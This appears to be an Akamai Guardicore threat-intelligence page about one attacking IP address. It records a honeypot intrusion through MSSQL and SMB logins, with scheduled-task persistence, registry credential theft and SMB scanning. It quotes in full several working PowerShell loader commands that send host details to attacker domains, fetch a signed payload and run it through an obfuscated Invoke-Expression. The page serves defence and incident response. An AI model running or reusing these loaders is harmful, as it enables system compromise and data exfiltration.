Cyber Threat Intelligence

Discover malicious IPs and domains with Akamai Guardicore Segmentation

IP Address: 111.254.60.45Previously Malicious

IP Address: 111.254.60.45Previously Malicious

This IP address attempted an attack on a machine in our threat sensors network

Threat Information

Role

Attacker, Scanner

Services Targeted

MSSQL SMB

Tags

Execute MsSql Shell Command Service Start Unauthorized Credential Access Successful SMB Login MSSQL SMB Share Connect SMB File Operation By CMD Scheduled Task Creation Successful MSSQL Login PowerShell CMD

Associated Attack Servers

-

Basic Information

IP Address

111.254.60.45

Domain

-

ISP

HiNet

Country

Taiwan, Province of China

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Akamai Guardicore Segmentation

2021-05-24

Last seen in Akamai Guardicore Segmentation

2021-05-24

What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: White List

Successful MSSQL Login

A user logged in using SMB with the following username: Administrator - Authentication policy: Reached Max Attempts

Successful SMB Login

MSSQL executed 2 shell commands

Execute MsSql Shell Command

A user logged in using MSSQL with the following credentials: sa / **** - Authentication policy: Previously Approved User 3 times

Successful MSSQL Login

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com

DNS Query Access Suspicious Domain Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80

Outgoing Connection

The command line blackball was scheduled to run by modifying C:\Windows\System32\Tasks\blackball

The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Y65I2GFrmR7

Service msiserver was started

Service Start

PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe 2 times

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: d.u78wjdu.com

DNS Query Access Suspicious Domain Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.251.24:80, 192.168.0.0:445, 192.168.0.10:445, 192.168.0.11:445, 192.168.0.12:445, 192.168.0.13:445, 192.168.0.14:445, 192.168.0.15:445, 192.168.0.16:445, 192.168.0.17:445, 192.168.0.18:445, 192.168.0.19:445, 192.168.0.1:445, 192.168.0.20:445, 192.168.0.21:445, 192.168.0.22:445, 192.168.0.23:445, 192.168.0.24:445, 192.168.0.25:445, 192.168.0.26:445, 192.168.0.27:445, 192.168.0.28:445, 192.168.0.29:445, 192.168.0.2:445, 192.168.0.30:445, 192.168.0.31:445, 192.168.0.32:445, 192.168.0.33:445, 192.168.0.34:445, 192.168.0.35:445, 192.168.0.36:445, 192.168.0.37:445, 192.168.0.38:445, 192.168.0.39:445, 192.168.0.3:445, 192.168.0.40:445, 192.168.0.41:445, 192.168.0.42:445, 192.168.0.43:445, 192.168.0.44:445, 192.168.0.45:445, 192.168.0.46:445, 192.168.0.47:445, 192.168.0.48:445, 192.168.0.49:445, 192.168.0.4:445, 192.168.0.50:445, 192.168.0.51:445, 192.168.0.52:445, 192.168.0.53:445, 192.168.0.54:445, 192.168.0.55:445, 192.168.0.56:445, 192.168.0.57:445, 192.168.0.58:445, 192.168.0.59:445, 192.168.0.5:445, 192.168.0.60:445, 192.168.0.61:445, 192.168.0.62:445, 192.168.0.63:445, 192.168.0.64:445, 192.168.0.65:445, 192.168.0.66:445, 192.168.0.67:445, 192.168.0.68:445, 192.168.0.69:445, 192.168.0.6:445, 192.168.0.70:445, 192.168.0.71:445, 192.168.0.72:445, 192.168.0.73:445, 192.168.0.74:445, 192.168.0.75:445, 192.168.0.76:445, 192.168.0.77:445, 192.168.0.78:445, 192.168.0.79:445, 192.168.0.7:445, 192.168.0.80:445, 192.168.0.81:445, 192.168.0.82:445, 192.168.0.83:445, 192.168.0.84:445, 192.168.0.85:445, 192.168.0.86:445, 192.168.0.87:445, 192.168.0.8:445, 192.168.0.9:445 and 54.225.222.160:443

Outgoing Connection

The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zke'+'r9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\C2jb0ZVDuPs\6mnCxpb4

The command line powershell -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com'+'/a.jsp?mso_20210507?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\olBv8pfZ3X\1JvNPpZEKa

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zz3r0.com

DNS Query Access Suspicious Domain

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.bb3u9.com

DNS Query Access Suspicious Domain Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 138.68.186.90:80

Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: t.zker9.com

DNS Query Access Suspicious Domain

c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to extract credentials from Windows Registry 69 times

Unauthorized Credential Access

Process netsvcs Service Group started listening on ports: 65529

Listening

Process c:\windows\system32\ipconfig.exe attempted to access suspicious domains: d.u78wjdu.com, t.bb3u9.com, t.zker9.com and t.zz3r0.com

DNS Query Access Suspicious Domain

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access domains: api.ipify.org and ctldl.windowsupdate.com

DNS Query

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe scanned port 445 on 88 IP Addresses

Port 445 Scan

Connection was closed due to timeout